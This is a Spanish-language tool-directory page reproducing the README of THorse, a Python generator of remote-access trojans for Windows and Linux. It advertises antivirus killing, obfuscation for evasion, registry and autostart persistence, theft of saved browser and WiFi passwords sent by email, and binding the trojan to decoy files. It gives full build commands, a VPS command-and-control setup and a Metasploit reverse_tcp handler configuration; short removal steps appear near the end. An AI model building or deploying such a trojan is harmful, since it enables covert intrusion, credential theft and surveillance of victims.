Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/pushpenderindia/thorse
Descifrado de ContraseñasFrameworks de ExploitsGeneración de PayloadsMecanismos de PersistenciaEvasión de IDS/IPSPost-ExplotaciónComando y ControlTroyano de Acceso RemotoAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse es un generador de RAT (Troyano de Administración Remota) para sistemas Windows/Linux escrito en Python 3.

614126hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

THorse

THorse es un generador de RAT (troyano de administración remota) para sistemas Windows/Linux escrito en Python 3.

root@kitploit:~
                    Este pequeño script de Python puede hacer un trabajo realmente increíble.

Descargo de responsabilidad

:computer: Este proyecto fue creado solo con fines legítimos y para uso personal.

ESTE SOFTWARE SE PROPORCIONA "TAL CUAL" SIN GARANTÍA DE NINGÚN TIPO. PUEDES UTILIZAR ESTE SOFTWARE BAJO TU PROPIO RIESGO. EL USO ES COMPLETA RESPONSABILIDAD DEL USUARIO FINAL. LOS DESARROLLADORES NO ASUMEN NINGUNA RESPONSABILIDAD Y NO SON RESPONSABLES DE NINGÚN USO INDEBIDO O DAÑO CAUSADO POR ESTE PROGRAMA.

Características

  • Funciona en Windows/Linux
  • Notifica a la nueva víctima por correo electrónico
  • Indetectable
  • No requiere privilegios de root o administrador
  • Persistencia
  • Envía una captura de pantalla de la pantalla del PC de la víctima por correo electrónico
  • Da acceso total a Meterpreter al atacante
  • Nunca requirió Metasploit instalado para crear el troyano
  • Crea un binario ejecutable con cero dependencias
  • Crea un payload de menor tamaño ~5 mb con funcionalidad avanzada
  • Ofusca el payload antes de compilarlo, evadiendo así algunos antivirus más
  • El payload generado está codificado con Base64, lo que hace extremadamente difícil la ingeniería inversa del payload
  • Mata el antivirus en el PC de la víctima e intenta desactivar el Centro de seguridad de Windows
  • Interfaz colorida e impresionante para generar payloads
Recuperaciones admitidas, intenta recuperar contraseñas guardadas de:
Navegador Chrome
WiFi

Nota: El stealer personalizado está codificado, no depende de LaZagne

Probado en

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Las siguientes son las limitaciones del payload de meterpreter generado con metasploit:-

  • Hay que ejecutar el listener de Metasploit antes de ejecutar la backdoor
  • La backdoor en sí no se vuelve persistente; tenemos que usar los módulos de post-explotación para hacerla persistente. Y los módulos de post-explotación solo pueden usarse después de una explotación exitosa.
  • No nos notifica cuando el payload se ejecuta en un sistema nuevo.

Todos sabemos lo potente que es el payload de Meterpreter, pero aún así el payload creado con él no es satisfactorio.

Las siguientes son las características de este generador de payloads que te darán una buena idea de este script de Python:-

  • Usa el registro de Windows para volverse persistente en Windows.
  • También logra volverse persistente en sistemas Linux.
  • El payload puede ejecutarse tanto en LINUX como en WINDOWS.
  • Proporciona acceso completo, ya que se puede usar el listener de metasploit y también soporta un listener personalizado (puedes crear tu propio listener).
  • Envía una notificación por correo electrónico, cuando el payload se ejecuta en un sistema nuevo, con información completa del sistema.
  • Genera el payload en 1 minuto o incluso menos.
  • Soporta todos los módulos de post-explotación de meterpreter.
  • El payload se puede crear tanto en Windows como en Linux.

Requisitos previos

  • Python 3.X
  • Algunos módulos externos

Por favor, ten en cuenta:

En Windows, especifica/establece la ruta de Pyinstaller en paygen.py [Línea 14]

La ruta predeterminada es esta : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Cámbiala de acuerdo a tu sistema

Cómo usar en Linux

root@kitploit:~
# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Cómo usar en VPS (Recomendado)

root@kitploit:~
# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update

# 8. Set Kali Priority
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. Update VPS
$ sudo apt update

# 10. Install Metasploit Framework in VPS
$ sudo apt install -t kali-rolling metasploit-framework

# NOTE: Above Steps needs to be performed only for once 

# 11. Install pip3
$ sudo apt install python3-pip

# 12. Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# 13. Go into the repository
$ cd thorse

# 14. Installing dependencies
$ bash installer_linux.sh

# 15. If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ 16. chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT (If you want to Compile RAT for Windows, then Build RAT on Windows Machine & Use VPS for Controlling RAT Remotely)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Cómo usar en Windows

root@kitploit:~
# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open paygen.py in Text editor and Configure Line 15, set Pyinstaller path, Default Path is as follows :-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe") 

# Getting Help Menu
$ python paygen.py --help

# Making Payload/RAT
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT binded with legitimate file [Any file .exe, .pdf, .txt etc]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Nota:- El archivo malicioso se guardará dentro de la carpeta dist/, dentro de la carpeta technowhorse/

Estableciendo conexión usando Msfconsole

  • Necesitas instalar Metasploit-Framework en tu sistema para establecer la conexión

  • Configuración recomendada; puedes probar con cualquier otro payload en la línea 2

root@kitploit:~
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

Cómo actualizar

  • Ejecuta updater.py para actualizar automáticamente o descarga el último ZIP desde este repositorio de GitHub
  • Nota: Git debe estar instalado para usar updater.py

Argumentos disponibles

  • Argumentos opcionales

Nota: Debe especificarse -w/--windows o -l/--linux

  • Argumentos requeridos

Nuevas capturas de pantalla:

Obteniendo ayuda

Generando payload

También consulta estas imágenes antiguas

~Capturas de pantalla antiguas:

Obteniendo ayuda

Ejecutando el script paygen.py

Cuando el RAT se ejecuta, añade una entrada de registro para volverse persistente

Hace una copia de sí mismo y la guarda dentro de Roaming

Informe enviado por el RAT

Recibiendo notificación del PC de la víctima

Contribuidores:

Actualmente este repositorio es mantenido por mí (Pushpender Singh). Pero si quieres convertirte en contribuidor, añade alguna característica interesante y haz un pull request; lo revisaré y lo fusionaré con este repositorio.

Se aceptarán las pull requests de todos los contribuidores si su pull request es valiosa para este repositorio.

TODO

  • Añadir nuevas características
  • Contribuir con GUI

Eliminar TechNowHorse en Windows:

Método 1:

  • Ve a Inicio, escribe regedit y ejecuta el primer programa; esto abrirá el editor de registro.
  • Navega a la siguiente ruta Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Debería haber una entrada llamada winexplorer; haz clic derecho sobre esta entrada y selecciona Eliminar.
  • Ve a la ruta de tu usuario > AppData > Roaming; verás un archivo llamado "explorer.exe", ese es el RAT; haz clic derecho > Eliminar.
  • Reinicia el sistema.

Método 2:

  • Ejecuta "RemoveTHorse.bat" en el sistema infectado y luego reinicia el PC para detener el archivo malicioso que se está ejecutando.

Eliminar TechNowHorse en Linux:

  • Abre el archivo de autostart con cualquier editor de texto, Ruta del archivo de autostart: ~/.config/autostart/xinput.desktop

  • Elimina estas 5 líneas:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • Nota: destination_file_name es el nombre del archivo malicioso que le diste a tu TrojanHorse usando el parámetro -o

  • Reinicia tu sistema y luego elimina el archivo malicioso almacenado en esta ruta de abajo

  • Ruta de destino, donde se almacena TrojanHorse : ~/.config/xnput

Contribuidores

  • Lista de contribuidores dedicados: Contribuidores

Pushpender Singh

:computer:

¡Las contribuciones de cualquier tipo son bienvenidas!

NOTA: Si deberías estar en la lista de contribuidores y te olvidamos, ¡háznoslo saber!

Lista de TODO

  • Sugiere tu propia función : )
  • Desarrollo de GUI
  • Corrección de errores
  • Añadir más robadores de contraseñas de navegadores
Descargar herramienta
  • En el lado del atacante: al crear el payload, el script detecta automáticamente las dependencias faltantes y las instala
  • Capacidad de añadir un icono personalizado al archivo malicioso
  • Binder integrado que puede vincular el ejecutable a cualquier archivo [.pdf, .txt, .exe, etc.], ejecutando el archivo legítimo en primer plano y los códigos maliciosos en segundo plano como un servicio.
  • Comprueba si ya hay una instancia en ejecución en el sistema; si se encuentra una instancia en ejecución, solo se ejecuta el archivo legítimo [Prohibidor de múltiples instancias].
  • El atacante puede crear/compilar para Windows/Linux OS usando un sistema Linux, pero solo puede crear/compilar un ejecutable de Windows usando una máquina Windows.
  • Recupera contraseñas guardadas del sistema de la víctima y las envía al atacante.
  • AbreviaturaCompletoDescripción
    -h--helpmuestra este mensaje de ayuda y sale
    -k KILL_AV--kill_av KILL_AVAntivirusKiller : especifica el .exe del antivirus que hay que eliminar. Ej.: --kill_av cmd.exe
    -t TIME_IN_SECONDS--persistence TIME_PERSISTENTSe vuelve persistente después de __ segundos. valor predeterminado=10
    -w--windowsGenera un ejecutable de Windows.
    -l--linuxGenera un ejecutable de Linux.
    -b file.txt--bind LEGITIMATE_FILE_PATH.pdfAutoBinder : especifica la ruta del archivo legítimo. [SO compatible: Windows]
    -s--steal-passwordRoba las contraseñas guardadas de la máquina de la víctima [SO compatible: Windows]
    -d--debugEjecuta el virus en primer plano
    AbreviaturaCompletoDescripción
    --icon ICONEspecifica la ruta del icono, el icono del archivo malicioso [Nota: debe ser .ico]
    --ip IP_ADDRESSDirección de correo electrónico para enviar informes.
    --port PORTPuerto de la dirección IP proporcionada en el argumento --ip.
    -e EMAIL--email EMAILDirección de correo electrónico para enviar informes.
    -p PASSWORD--password PASSWORDContraseña para la dirección de correo electrónico dada en el argumento -e.
    -o OUT--out OUTNombre del archivo de salida.